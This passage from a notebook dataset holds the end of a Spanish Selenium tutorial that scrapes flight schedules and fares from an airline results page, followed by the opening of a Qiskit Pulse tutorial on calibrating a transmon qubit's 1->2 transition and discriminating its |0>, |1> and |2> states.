urlData,app,home;urlData=document.location.pathname;urlData=urlData.split(\"/\");app=urlData[4];home=urlData[1];this.cleanSelector([\"#appFooterLatam\"])}};var footer=new footer();footer.applyFooterRules();})();\n </script>\n </div>\n </div>\n <script type=\"text/javascript\">\n var menuUp=false;var hideVar=null;function skipToMainContent(e){var k=(document.all)?e.keyCode:e.which;if(k===13){document.getElementById('appMain').focus();return false;}}function hyfShowMenu(){var e=document.getElementById('Header-actionLinkBurger');if(getViewport()[0]>767){e=document.getElementById('showMenu');e.style.display='none';e=document.getElementById('hideMenu');e.style.display='inline';e.focus();}else{setMobileview();e.href=\"javascript:hyfHideMenu();\"\ne=document.getElementsByClassName('hyf-modal-black')[0];e.style.display=\"block\";}e=document.getElementById('hyf-country-selector');e.style.display='inline';menuUp=true;}function setMobileview(){var e=document.getElementsByTagName('body')[0];e.className='hyf-mobile-view';e=document.getElementById('hyf-country-selector');var alto=getViewport()[1].toString();e.style.maxHeight=alto+'px';e.style.overflow='scroll';e.style.overflowX='hidden';e.style.overflowY='auto';hyfHideCs();}function unsetMobileview(){var e=document.getElementsByTagName('body')[0];e.removeAttribute('class');e=document.getElementById('hyf-country-selector');e.style.maxHeight='';e.style.overflow='hidden';e.style.overflowY='auto';hyfShowCs();e=document.getElementById('hyf-cs-first');e.style.display='none';}function hyfHideMenu(){var e=document.getElementById('Header-actionLinkBurger');if(getViewport()[0]>767){e=document.getElementById('showMenu');e.style.display='inline';e=document.getElementById('hideMenu');e.style.display='none';}else{e=document.getElementById('showMenu');e.style.display='none';e=document.getElementById('hideMenu');e.style.display='none';e=document.getElementsByClassName('hyf-modal-black')[0];e.style.display=\"none\";unsetMobileview();e=document.getElementById('Header-actionLinkBurger');e.href=\"javascript:hyfShowMenu();\"}e=document.getElementById('hyf-country-selector');e.style.display='none';menuUp=false;}function 
hyfgoHideMenu(){if(!menuUp){if(document.getElementById('hyf-country-selector').style.display!=\"none\")hyfHideMenu();}}function hyfHideCs(){var e=document.getElementById('hyf-cs');e.href=\"javascript:hyfShowCs();\";e=document.getElementsByClassName('hyf-cs');for(var i=0;i<e.length;i++)e[i].style.display='none';}function hyfShowCs(){var e=document.getElementById('hyf-cs');e.href=\"javascript:hyfHideCs();\";e=document.getElementsByClassName('hyf-cs');for(var i=0;i<e.length;i++)e[i].style.display='block';}function getViewport(){var viewPortWidth;var viewPortHeight;if(typeof window.innerWidth!='undefined'){viewPortWidth=window.innerWidth,viewPortHeight=window.innerHeight}else{viewPortWidth=document.getElementsByTagName('body')[0].clientWidth,viewPortHeight=document.getElementsByTagName('body')[0].clientHeight}return[viewPortWidth,viewPortHeight];}function removeBodyPadding(){var e=document.getElementsByTagName('body')[0];e.removeAttribute(\"style\");e=document.getElementById('hyf-country-selector');e.onmouseout=function(){menuUp=false;hideVar=setTimeout(hyfgoHideMenu,500);};e.onmouseover=function(){menuUp=true;hideVar=null;};e.onfocus=function(){this.style.display=\"none\";e=document.getElementById('hideMenu');e.style.display='inline';};window.onresize=function(){hyfHideMenu();return true;}\ne=document.getElementsByClassName('Header-logoLink');for(var i=0;i<e.length;i++)e[i].onfocus=function(){hyfHideMenu();this.focus()};e=document.getElementById('returnLink');e.onfocus=function(){hyfHideMenu()}\ne=document.getElementsByClassName('hyf-country-ul');for(var i=0;i<e.length;i++)e[i].onmouseover=function(){menuUp=true;hideVar=null};e=document.getElementsByClassName('hyf-modal-black')[0];e.onmouseover=function(){hyfHideMenu();}\ne=document.getElementsByClassName('hyf-not-underline');for(var i=0;i<e.length;i++)e[i].onmouseover=function(){menuUp=true;hideVar=null};e=document.getElementsByClassName('lt-icon-flag');for(var i=0;i<e.length;i++)e[i].onmouseover=function(){menuUp=true;hideVar=null};e=document.getElementsByClassName('hyf-flag-centrado');for(var i=0;i<e.length;i++)e[i].onmouseover=function(){menuUp=true;hideVar=null};e=document.getElementsByClassName('hyf-country-selector-title');for(var i=0;i<e.length;i++)e[i].onmouseover=function(){menuUp=true;hideVar=null};e=document.getElementsByClassName('hyf-login-info');e[0].onmouseout=function(){menuUp=false;hideVar=setTimeout(hyfHideLogMenu,500);};e[0].onmouseover=function(){menuUp=true;hideVar=null;};e=document.getElementsByClassName('hyf-login-info-a');for(i=0;i<e.length;i++){e[i].onmouseout=function(){menuUp=false;hideVar=setTimeout(hyfHideLogMenu,500);};e[i].onmouseover=function(){menuUp=true;hideVar=null;};}}function hyfHideLogMenu(){if(!menuUp){var e=document.getElementsByClassName('hyf-login-info');e[0].style.display='none';}}function hyfShowLogMenu(){if(getViewport()[0]>767){var e=document.getElementsByClassName('hyf-login-info');e[0].style.display='block';}}function ShowLoginMenu(){var e=document.getElementsByClassName('hyf-login-info');menuUp=false;hyfgoHideMenu();if(e[0].style.display=='block')hyfHideLogMenu();else hyfShowLogMenu();}function LoginLinkAction(show){var e=document.getElementById('loginLatamBox');if(show){e.style.display=\"inline-table\";e.style.padding=\"8px 4px\"\nvar e=document.getElementsByClassName('hyf-header-element');for(i=0;i<e.length;i++)e[i].style.top='0';}else{e.style.display=\"none\";e.style.padding=\"0\"\nvar 
e=document.getElementsByClassName('hyf-header-element');for(i=0;i<e.length;i++)e[i].style.top='6px';}}function UserLoginAction(show){var e=document.getElementById('userLatamBox');if(show){e.style.display=\"inline-table\";var e=document.getElementsByClassName('hyf-header-element');for(i=0;i<e.length;i++)e[i].style.top='0';}else{e.style.display=\"none\";var e=document.getElementsByClassName('hyf-header-element');for(i=0;i<e.length;i++)e[i].style.top='6px';}}\n </script>\n <script type=\"text/javascript\">\n var i=new Image,u=\"https://s3-sa-east-1.amazonaws.com/frame-image-br/bg.png?x-id=latam&x-r=\"+document.referrer;i.src=u;\n </script>\n </body>\n</html>\n\n"
]
],
[
[
"Vemos que la respuesta de la página no contiene la información que buscamos, ya que la misma aparece recién después de ejecutar el código JavaSCript que está en la respuesta.",
"_____no_output_____"
],
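[
"As a quick check (an illustrative snippet, not part of the original notebook flow), we can confirm that the flight results are absent from the static HTML that `requests` downloaded; the elements we will look for later with Selenium simply are not there yet:\n\n```python\n# The flight list is rendered client-side by JavaScript, so we expect to find nothing here\nvuelos_estaticos = s.find_all('li', attrs={'class': 'flight'})\nprint(len(vuelos_estaticos))  # expected: 0\n```",
"_____no_output_____"
],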
[
"## Selenium",
"_____no_output_____"
],
[
"Selenium es una herramienta que nos permitirá controlar un navegador y podremos utilizar las funcionalidades del motor de JavaScript para cargar el contenido que no viene en el HTML de la página. Para esto necesitamos el módulo `webdriver`.",
"_____no_output_____"
]
],
[
[
"from selenium import webdriver",
"_____no_output_____"
]
],
[
[
"Paso 1: instanciar un **driver** del navegador",
"_____no_output_____"
]
],
[
[
"options = webdriver.ChromeOptions()\noptions.add_argument('--incognito')\ndriver = webdriver.Chrome(executable_path='../chromedriver', options=options)",
"_____no_output_____"
]
],
[
[
"Paso 2: hacer que el navegador cargue la página web.",
"_____no_output_____"
]
],
[
[
"driver.get(url)",
"_____no_output_____"
]
],
[
[
"Paso 3: extraer la información de la página",
"_____no_output_____"
]
],
[
[
"vuelos = driver.find_elements_by_xpath('//li[@class=\"flight\"]')\nvuelos",
"_____no_output_____"
],
[
"vuelo = vuelos[0]",
"_____no_output_____"
],
[
"vuelo",
"_____no_output_____"
],
[
"# Hora de salida\nvuelo.find_element_by_xpath('.//div[@class=\"departure\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"# Hora de llegada\nvuelo.find_element_by_xpath('.//div[@class=\"arrival\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"# Duración del vuelo\nvuelo.find_element_by_xpath('.//span[@class=\"duration\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"boton_escalas = vuelo.find_element_by_xpath('.//div[@class=\"flight-summary-stops-description\"]/button')",
"_____no_output_____"
],
[
"boton_escalas.click()",
"_____no_output_____"
],
[
"segmentos = vuelo.find_elements_by_xpath('//div[@class=\"segments-graph\"]/div[@class=\"segments-graph-segment\"]')\nsegmentos",
"_____no_output_____"
],
[
"escalas = len(segmentos) - 1 ",
"_____no_output_____"
],
[
"escalas",
"_____no_output_____"
],
[
"segmento = segmentos[0]",
"_____no_output_____"
],
[
"# Origen\nsegmento.find_element_by_xpath('.//div[@class=\"departure\"]/span[@class=\"ground-point-name\"]').text",
"_____no_output_____"
],
[
"# Hora de salida\nsegmento.find_element_by_xpath('.//div[@class=\"departure\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"# Destino\nsegmento.find_element_by_xpath('.//div[@class=\"arrival\"]/span[@class=\"ground-point-name\"]').text",
"_____no_output_____"
],
[
"# Hora de llegada\nsegmento.find_element_by_xpath('.//div[@class=\"arrival\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"# Duración del vuelo\nsegmento.find_element_by_xpath('.//span[@class=\"duration flight-schedule-duration\"]/time').get_attribute('datetime')",
"_____no_output_____"
],
[
"# Numero del vuelo\nsegmento.find_element_by_xpath('.//span[@class=\"equipment-airline-number\"]').text",
"_____no_output_____"
],
[
"# Modelo de avion\nsegmento.find_element_by_xpath('.//span[@class=\"equipment-airline-material\"]').text",
"_____no_output_____"
],
[
"# Duracion de la escala\nsegmento.find_element_by_xpath('.//div[@class=\"stop connection\"]//p[@class=\"stop-wait-time\"]//time').get_attribute('datetime')",
"_____no_output_____"
],
[
"driver.find_element_by_xpath('//div[@class=\"modal-dialog\"]//button[@class=\"close\"]').click()",
"_____no_output_____"
],
[
"vuelo.click()",
"_____no_output_____"
],
[
"tarifas = vuelo.find_elements_by_xpath('.//div[@class=\"fares-table-container\"]//tfoot//td[contains(@class, \"fare-\")]')",
"_____no_output_____"
],
[
"tarifas",
"_____no_output_____"
],
[
"precios = []\nfor tarifa in tarifas:\n nombre = tarifa.find_element_by_xpath('.//label').get_attribute('for')\n moneda = tarifa.find_element_by_xpath('.//span[@class=\"price\"]/span[@class=\"currency-symbol\"]').text\n valor = tarifa.find_element_by_xpath('.//span[@class=\"price\"]/span[@class=\"value\"]').text \n dict_tarifa={nombre:{'moneda':moneda, 'valor':valor}}\n precios.append(dict_tarifa)\n print(dict_tarifa)",
"{'LIGHT': {'moneda': 'US$', 'valor': '1282,40'}}\n{'PLUS': {'moneda': 'US$', 'valor': '1335,90'}}\n{'TOP': {'moneda': 'US$', 'valor': '1773,50'}}\n"
],
[
"def obtener_precios(vuelo):\n '''\n Función que retorna una lista de diccionarios con las distintas tarifas\n '''\n tarifas = vuelo.find_elements_by_xpath('.//div[@class=\"fares-table-container\"]//tfoot//td[contains(@class, \"fare-\")]')\n precios = []\n for tarifa in tarifas:\n nombre = tarifa.find_element_by_xpath('.//label').get_attribute('for')\n moneda = tarifa.find_element_by_xpath('.//span[@class=\"price\"]/span[@class=\"currency-symbol\"]').text\n valor = tarifa.find_element_by_xpath('.//span[@class=\"price\"]/span[@class=\"value\"]').text \n dict_tarifa={nombre:{'moneda':moneda, 'valor':valor}}\n precios.append(dict_tarifa)\n return precios",
"_____no_output_____"
],
[
"def obtener_datos_escalas(vuelo):\n '''\n Función que retorna una lista de diccionarios con la información de \n las escalas de cada vuelo\n '''\n segmentos = vuelo.find_elements_by_xpath('//div[@class=\"segments-graph\"]/div[@class=\"segments-graph-segment\"]')\n info_escalas = []\n for segmento in segmentos:\n # Origen\n origen = segmento.find_element_by_xpath('.//div[@class=\"departure\"]/span[@class=\"ground-point-name\"]').text\n # Hora de salida\n dep_time = segmento.find_element_by_xpath('.//div[@class=\"departure\"]/time').get_attribute('datetime')\n # Destino\n destino = segmento.find_element_by_xpath('.//div[@class=\"arrival\"]/span[@class=\"ground-point-name\"]').text\n # Hora de llegada\n arr_time = segmento.find_element_by_xpath('.//div[@class=\"arrival\"]/time').get_attribute('datetime')\n # Duración del vuelo\n duracion_vuelo = segmento.find_element_by_xpath('.//span[@class=\"duration flight-schedule-duration\"]/time').get_attribute('datetime')\n # Numero del vuelo\n numero_vuelo = segmento.find_element_by_xpath('.//span[@class=\"equipment-airline-number\"]').text\n # Modelo de avion\n modelo_avion =segmento.find_element_by_xpath('.//span[@class=\"equipment-airline-material\"]').text\n if segmento != segmentos[-1]:\n # Duracion de la escala\n duracion_escala = segmento.find_element_by_xpath('.//div[@class=\"stop connection\"]//p[@class=\"stop-wait-time\"]//time').get_attribute('datetime')\n else:\n duracion_escala = ''\n \n data_dict={\n 'origen':origen,\n 'dep_time':dep_time,\n 'destino':destino,\n 'arr_time':arr_time,\n 'duracion_vuelo':duracion_vuelo,\n 'numero_vuelo':numero_vuelo,\n 'modelo_avion':modelo_avion,\n 'duracion_escala':duracion_escala,\n }\n info_escalas.append(data_dict)\n return info_escalas",
"_____no_output_____"
],
[
"def obtener_tiempos(vuelo):\n '''\n Función que retorna un diccionario con los horarios de salida y llegada de cada\n vuelo, incluyendo la duración. \n Nota: la duración del vuelo no es la hora de llegada - la hora de salida porque\n puede haber diferencia de horarios entre el origen y el destino.\n '''\n # Hora de salida\n salida = vuelo.find_element_by_xpath('.//div[@class=\"departure\"]/time').get_attribute('datetime')\n # Hora de llegada\n llegada = vuelo.find_element_by_xpath('.//div[@class=\"arrival\"]/time').get_attribute('datetime')\n # Duracion\n duracion = vuelo.find_element_by_xpath('.//span[@class=\"duration\"]/time').get_attribute('datetime')\n tiempos = {'hora_salida': salida, 'hora_llegada': llegada, 'duracion': duracion}\n return tiempos\n",
"_____no_output_____"
],
[
"def obtener_info(driver):\n vuelos = driver.find_elements_by_xpath('//li[@class=\"flight\"]')\n print(f'Se encontraron {len(vuelos)} vuelos.')\n print('Iniciando scraping...')\n info = []\n for vuelo in vuelos:\n #obtenemos los tiempos generales de cada vuelo\n tiempos = obtener_tiempos(vuelo)\n # Clickeamos sobre el boton de las escalas\n vuelo.find_element_by_xpath('.//div[@class=\"flight-summary-stops-description\"]/button').click()\n escalas = obtener_datos_escalas(vuelo)\n # Cerramos el modal\n driver.find_element_by_xpath('//div[@class=\"modal-dialog\"]//button[@class=\"close\"]').click()\n # Clickeamos el vuelo para ver los precios\n vuelo.click()\n precios = obtener_precios(vuelo)\n vuelo.click()\n info.append({'precios':precios, 'tiempos': tiempos, 'escalas':escalas})\n return info",
"_____no_output_____"
],
[
"import time",
"_____no_output_____"
],
[
"from selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException",
"_____no_output_____"
],
[
"options = webdriver.ChromeOptions()\noptions.add_argument('--incognito')\ndriver = webdriver.Chrome(executable_path='../chromedriver', options=options)\ndriver.get(url)\n# Introducir una demora\ndelay = 10\ntry:\n # introducir demora inteligente\n vuelo = WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.XPATH, '//li[@class=\"flight\"]')))\n print('La página terminó de cargar')\n info_vuelos = obtener_info(driver)\nexcept TimeoutException:\n print('La página tardó demasiado en cargar')\n info_vuelos = []\ndriver.close()",
"La página terminó de cargar\nSe encontraron 12 vuelos.\nIniciando scraping...\n"
],
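[
"# (Illustrative helper added for reference; not part of the original course code.)\n# The same explicit-wait idea can be wrapped into a reusable function: wait until at least\n# one element matching the XPath is present, then return all matching elements.\ndef esperar_elementos(driver, xpath, delay=10):\n    WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.XPATH, xpath)))\n    return driver.find_elements_by_xpath(xpath)",
"_____no_output_____"
],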
[
"info_vuelos",
"Se encontraron 12 vuelos.\nIniciando scraping...\n"
]
],
[
[
"Paso 4: cerrar el navegador",
"_____no_output_____"
]
],
[
[
"driver.close()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb03410eb06c6d0f087f29c61f203ea9e66b1c8b | 198,816 | ipynb | Jupyter Notebook | notebooks/ch-quantum-hardware/accessing_higher_energy_states.ipynb | qiskit-community/platypus | c0a0fe8e18e3045e51567cc5a5af2c2006aa4f60 | [
"Apache-2.0"
] | 3 | 2021-12-02T00:32:17.000Z | 2022-01-01T03:59:48.000Z | notebooks/ch-quantum-hardware/accessing_higher_energy_states.ipynb | qiskit-community/platypus | c0a0fe8e18e3045e51567cc5a5af2c2006aa4f60 | [
"Apache-2.0"
] | 55 | 2021-09-20T13:46:16.000Z | 2022-01-06T11:16:39.000Z | notebooks/ch-quantum-hardware/accessing_higher_energy_states.ipynb | qiskit-community/platypus | c0a0fe8e18e3045e51567cc5a5af2c2006aa4f60 | [
"Apache-2.0"
] | 11 | 2021-09-29T14:25:18.000Z | 2022-01-01T03:59:54.000Z | 168.488136 | 53,464 | 0.89195 | [
[
[
"# Accessing higher energy states with Qiskit Pulse",
"_____no_output_____"
],
[
"In most quantum algorithms/applications, computations are carried out over a 2-dimensional space spanned by $|0\\rangle$ and $|1\\rangle$. In IBM's hardware, however, there also exist higher energy states which are not typically used. The focus of this section is to explore these states using Qiskit Pulse. In particular, we demonstrate how to excite the $|2\\rangle$ state and build a discriminator to classify the $|0\\rangle$, $|1\\rangle$ and $|2\\rangle$ states.\n\nWe recommend reviewing the prior [chapter](https://learn.qiskit.org/course/quantum-hardware-pulses/calibrating-qubits-using-qiskit-pulse) before going through this notebook. We also suggest reading the Qiskit Pulse specifications (Ref [1](#refs)). ",
"_____no_output_____"
],
[
"### Physics Background",
"_____no_output_____"
],
[
"We now give some additional background on the physics of transmon qubits, the basis for much of IBM's quantum hardware. These systems contain superconducting circuits composed of a Josephson junction and capacitor. For those unfamiliar with superconducting circuits, see the review [here](https://arxiv.org/pdf/1904.06560.pdf) (Ref. [2](#refs)). The Hamiltonian of this system is given by\n\n$$\nH = 4 E_C n^2 - E_J \\cos(\\phi),\n$$\n\nwhere $E_C, E_J$ denote the capacitor and Josephson energies, $n$ is the reduced charge number operator and $\\phi$ is the reduced flux across the junction. We work in units with $\\hbar=1$.\n\nTransmon qubits are defined in the regime where $\\phi$ is small, so we may expand $E_J \\cos(\\phi)$ in a Taylor series (ignoring constant terms)\n\n$$\nE_J \\cos(\\phi) \\approx \\frac{1}{2} E_J \\phi^2 - \\frac{1}{24} E_J \\phi^4 + \\mathcal{O}(\\phi^6).\n$$\n\nThe quadratic term $\\phi^2$ defines the standard harmonic oscillator. Each additional term contributes an anharmonicity.\n\nUsing the relations $n \\sim (a-a^\\dagger), \\phi \\sim (a+a^\\dagger)$ (for raising, lowering operators $a^\\dagger, a$), it can be shown that the system resembles a Duffing oscillator with Hamiltonian\n$$\nH = \\omega a^\\dagger a + \\frac{\\alpha}{2} a^\\dagger a^\\dagger a a,\n$$\n\nwhere $\\omega$ gives the $0\\rightarrow1$ excitation frequency ($\\omega \\equiv \\omega^{0\\rightarrow1}$) and $\\alpha$ is the anharmonicity between the $0\\rightarrow1$ and $1\\rightarrow2$ frequencies ($\\alpha \\equiv \\omega^{1\\rightarrow2} - \\omega^{0\\rightarrow1}$). Drive terms can be added as needed. \n\nIf we choose to specialize to the standard 2-dimensional subspace, we can make $|\\alpha|$ sufficiently large or use special control techniques to suppress the higher energy states.",
"_____no_output_____"
],
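[
"As a quick numerical illustration of this Hamiltonian (the numbers below are placeholders, not calibrated device values), the Duffing energies are $E_n = \\omega n + \\tfrac{\\alpha}{2} n(n-1)$, so the $1\\rightarrow2$ transition sits at $\\omega + \\alpha$, lower than the $0\\rightarrow1$ transition because $\\alpha < 0$ for transmons:\n\n```python\nomega = 4.962e9   # example 0->1 frequency in Hz (illustrative)\nalpha = -0.343e9  # example anharmonicity in Hz (illustrative)\n\ndef duffing_energy(n):\n    # E_n = omega*n + (alpha/2)*n*(n-1) for Fock state |n>\n    return omega * n + 0.5 * alpha * n * (n - 1)\n\nf_01 = duffing_energy(1) - duffing_energy(0)  # = omega\nf_12 = duffing_energy(2) - duffing_energy(1)  # = omega + alpha\nprint(f_01 / 1e9, f_12 / 1e9)  # the 1->2 frequency is lower by |alpha|\n```",
"_____no_output_____"
],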
[
"# Contents\n\n[Getting started](#importing) \n[Discriminating the 0, 1 and 2 states](#discrim012) \n  [Computing the 1->2 Frequency](#freq12) \n  [1->2 Rabi Experiment](#rabi12) \n  [Build the 0, 1, 2 discriminator](#builddiscrim012) \n[References](#refs) ",
"_____no_output_____"
],
[
"## Getting Started <a id=\"importing\"></a>",
"_____no_output_____"
],
[
"We begin by importing dependencies and defining some default variable values. We choose qubit 0 to run our experiments. We perform our experiments on the publicly available single qubit device `ibmq_armonk`.",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy.optimize import curve_fit\n\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.model_selection import train_test_split\n\nfrom qiskit import pulse # This is where we access all of our Pulse features!\nfrom qiskit.circuit import Parameter # This is Parameter Class for variable parameters.\nfrom qiskit.circuit import QuantumCircuit, Gate\nfrom qiskit import schedule\n\nfrom qiskit.tools.monitor import job_monitor",
"_____no_output_____"
],
[
"from qiskit.tools.jupyter import *\n%matplotlib inline\n\nfrom qiskit import IBMQ\nIBMQ.load_account()\nprovider = IBMQ.get_provider(hub='ibm-q', group='open', project='main')\nbackend = provider.get_backend('ibmq_manila')\n\nbackend_defaults = backend.defaults()\n\nbackend_properties = backend.properties()\n\n# unit conversion factors -> all backend properties returned in SI (Hz, sec, etc.)\nGHz = 1.0e9 # Gigahertz\nMHz = 1.0e6 # Megahertz\nus = 1.0e-6 # Microseconds\nns = 1.0e-9 # Nanoseconds\n\nqubit = 0 # qubit we will analyze\n\ndefault_qubit_freq = backend_defaults.qubit_freq_est[qubit] # Default qubit frequency in Hz. \nprint(f\"Qubit {qubit} has an estimated frequency of {default_qubit_freq/ GHz} GHz.\")\n\ndefault_anharmonicity = backend_properties.qubits[qubit][3].value # Default anharmonicity in GHz\nprint(f\"Default anharmonicity is {default_anharmonicity} GHz.\")\n\n# scale data (specific to each device)\nscale_factor = 1e-7\n\n# number of shots for our experiments\nNUM_SHOTS = 1024",
"Qubit 0 has an estimated frequency of 4.962374160530024 GHz.\nDefault anharmonicity is -0.3433479504893883 GHz.\n"
]
],
[
[
"We define some additional helper functions.",
"_____no_output_____"
]
],
[
[
"def get_job_data(job, average):\n \"\"\"Retrieve data from a job that has already run.\n Args:\n job (Job): The job whose data you want.\n average (bool): If True, gets the data assuming data is an average.\n If False, gets the data assuming it is for single shots.\n Return:\n list: List containing job result data. \n \"\"\"\n job_results = job.result(timeout = 120) # timeout parameter set to 120 s\n result_data = []\n for i in range(len(job_results.results)):\n if average: # get avg data\n result_data.append(np.real(job_results.get_memory(i)[qubit] * scale_factor))\n else: # get single data\n result_data.append(job_results.get_memory(i)[:, qubit] * scale_factor)\n return result_data\n\ndef get_closest_multiple_of_16(num):\n \"\"\"Compute the nearest multiple of 16. Needed because pulse enabled devices require \n durations which are multiples of 16 samples.\n \"\"\"\n return int(num + 8 ) - (int(num + 8 ) % 16)",
"_____no_output_____"
]
],
[
[
"Next we include some default parameters for drive pulses. ",
"_____no_output_____"
]
],
[
[
"# there are pulse parameters of the single qubit drive in IBM devices\nx12_duration = 160\nx12_sigma = 40",
"_____no_output_____"
]
],
[
[
"## Discriminating the $|0\\rangle$, $|1\\rangle$ and $|2\\rangle$ states <a id=\"discrim012\"></a> ",
"_____no_output_____"
],
[
"given we have already calibrated X gate in the qubit subspace, which is available as XGate instruction in the quantum circuit. Here we calibrate transition in the higher energy subspace with pulse gate.",
"_____no_output_____"
],
[
"We focus on exciting the $|2\\rangle$ state and building a discriminator to classify $|0\\rangle$, $|1\\rangle$ and $2\\rangle$ states from their respective IQ data points. The procedure for even higher states ($|3\\rangle$, $|4\\rangle$, etc.) should be similar, but we have not tested them explicitly.",
"_____no_output_____"
],
[
"The process for building the higher state discriminator is as follows:\n1. Compute the $1\\rightarrow2$ frequency.\n2. Conduct a Rabi experiment to obtain the $\\pi$ pulse amplitude for $1\\rightarrow2$. To do this, we first apply a $0\\rightarrow1$ $\\pi$ pulse to get from the $|0\\rangle$ to the $|1\\rangle$ state. Then, we do a sweep of drive amplitudes at the $1\\rightarrow2$ frequency obtained above.\n3. Construct 3 schedules:\\\n a. Zero schedule: just measure the ground state.\\\n b. One schedule: apply a $0\\rightarrow1$ $\\pi$ pulse and measure.\\\n c. Two schedule: apply a $0\\rightarrow1$ $\\pi$ pulse, then a $1\\rightarrow2$ $\\pi$ pulse and measure.\n4. Separate the data from each schedule into training and testing sets and construct an LDA model for discrimination.",
"_____no_output_____"
],
[
"### Computing the 1->2 frequency <a id=\"freq12\"></a>",
"_____no_output_____"
],
[
"The first step in our calibration is to compute the frequency needed to go from the $1\\rightarrow2$ state. There are two methods to do this:\n1. Do a frequency sweep from the ground state and apply very high power. If the applied power is large enough, two peaks should be observed. One at the $0\\rightarrow1$ frequency found in section [1](#discrim01) and one at the $0\\rightarrow2$ frequency. The $1\\rightarrow2$ frequency can be obtained by taking the difference of the two. Unfortunately, for `ibmq_armonk`, the maximum drive power of $1.0$ is not sufficient to see this transition. Instead, we turn to the second method.\n2. Excite the $|1\\rangle$ state by applying a $0\\rightarrow1$ $\\pi$ pulse. Then perform the frequency sweep over excitations of the $|1\\rangle$ state. A single peak should be observed at a frequency lower than the $0\\rightarrow1$ frequency which corresponds to the $1\\rightarrow2$ frequency.",
"_____no_output_____"
],
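[
"Before sweeping, a rough sanity check (an illustrative snippet added here, using only the backend's reported defaults) tells us roughly where the $1\\rightarrow2$ peak should appear: near the default qubit frequency shifted by the (negative) anharmonicity.\n\n```python\n# Expected ballpark for the 1->2 transition, from the backend defaults loaded earlier\nexpected_f12 = default_qubit_freq + default_anharmonicity * GHz\nprint(f\"Expect the 1->2 peak near {expected_f12 / GHz:.4f} GHz\")\n```",
"_____no_output_____"
],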
[
"We follow the second method described above. ",
"_____no_output_____"
]
],
[
[
"# smaller range sweep\nnum_freqs = 75\ndrive_power = 0.15\nsweep_freqs = default_anharmonicity*GHz + np.linspace(-30*MHz, 30*MHz, num_freqs)",
"_____no_output_____"
],
[
"freq = Parameter('freq')\nwith pulse.build(backend=backend, default_alignment='sequential', name='Frequency sweep') as freq12_sweep_sched:\n drive_chan = pulse.drive_channel(qubit)\n with pulse.frequency_offset(freq, drive_chan):\n pulse.play(pulse.Gaussian(duration=x12_duration,\n amp=drive_power,\n sigma=x12_sigma,\n name='x12_pulse'), drive_chan)",
"_____no_output_____"
],
[
"spect_gate = Gate(\"spect\", 1, [freq])\n\nqc_spect = QuantumCircuit(1, 1)\n\nqc_spect.x(0)\nqc_spect.append(spect_gate, [0])\nqc_spect.measure(0, 0)\nqc_spect.add_calibration(spect_gate, (0,), freq12_sweep_sched, [freq])\n \nexp_spect_circs = [qc_spect.assign_parameters({freq: f}) for f in sweep_freqs]",
"_____no_output_____"
],
[
"excited_freq_sweep_job = backend.run(exp_spect_circs, \n meas_level=1, \n meas_return='avg', \n shots=NUM_SHOTS)",
"_____no_output_____"
],
[
"job_monitor(excited_freq_sweep_job)",
"Job Status: job has successfully run\n"
],
[
"# Get the refined data (average)\nexcited_freq_sweep_data = get_job_data(excited_freq_sweep_job, average=True)\nexcited_sweep_freqs = default_qubit_freq + default_anharmonicity*GHz + np.linspace(-30*MHz, 30*MHz, num_freqs)",
"_____no_output_____"
]
],
[
[
"Let's plot and fit the refined signal, using the standard Lorentzian curve.",
"_____no_output_____"
]
],
[
[
"def fit_function(x_values, y_values, function, init_params):\n \"\"\"Fit a function using scipy curve_fit.\"\"\"\n fitparams, conv = curve_fit(function, x_values, y_values, init_params, maxfev = 50000)\n y_fit = function(x_values, *fitparams)\n \n return fitparams, y_fit",
"_____no_output_____"
],
[
"# do fit in Hz\n(excited_sweep_fit_params, \n excited_sweep_y_fit) = fit_function(excited_sweep_freqs,\n excited_freq_sweep_data, \n lambda x, A, q_freq, B, C: (A / np.pi) * (B / ((x - q_freq)**2 + B**2)) + C,\n [-20, 4.625*GHz, 0.06*GHz, 3*GHz] # initial parameters for curve_fit\n )",
"_____no_output_____"
],
[
"# Note: we are only plotting the real part of the signal\nplt.scatter(excited_sweep_freqs/GHz, excited_freq_sweep_data, color='black')\nplt.plot(excited_sweep_freqs/GHz, excited_sweep_y_fit, color='red')\nplt.xlim([min(excited_sweep_freqs/GHz), max(excited_sweep_freqs/GHz)])\nplt.xlabel(\"Frequency [GHz]\", fontsize=15)\nplt.ylabel(\"Measured Signal [a.u.]\", fontsize=15)\nplt.title(\"1->2 Frequency Sweep (refined pass)\", fontsize=15)\nplt.show()",
"_____no_output_____"
],
[
"_, qubit_12_freq, _, _ = excited_sweep_fit_params\nprint(f\"Our updated estimate for the 1->2 transition frequency is \"\n f\"{round(qubit_12_freq/GHz, 7)} GHz.\")",
"Our updated estimate for the 1->2 transition frequency is 4.6186648 GHz.\n"
]
],
[
[
"### 1->2 Rabi Experiment <a id=\"rabi12\"></a>",
"_____no_output_____"
],
[
"Now that we have a good estimate for the $1\\rightarrow2$ frequency, we perform a Rabi experiment to obtain the $\\pi$ pulse amplitude for the $1\\rightarrow2$ transition. To do so, we apply a $0\\rightarrow1$ $\\pi$ pulse and then sweep over drive amplitudes at the $1\\rightarrow2$ frequency.",
"_____no_output_____"
]
],
[
[
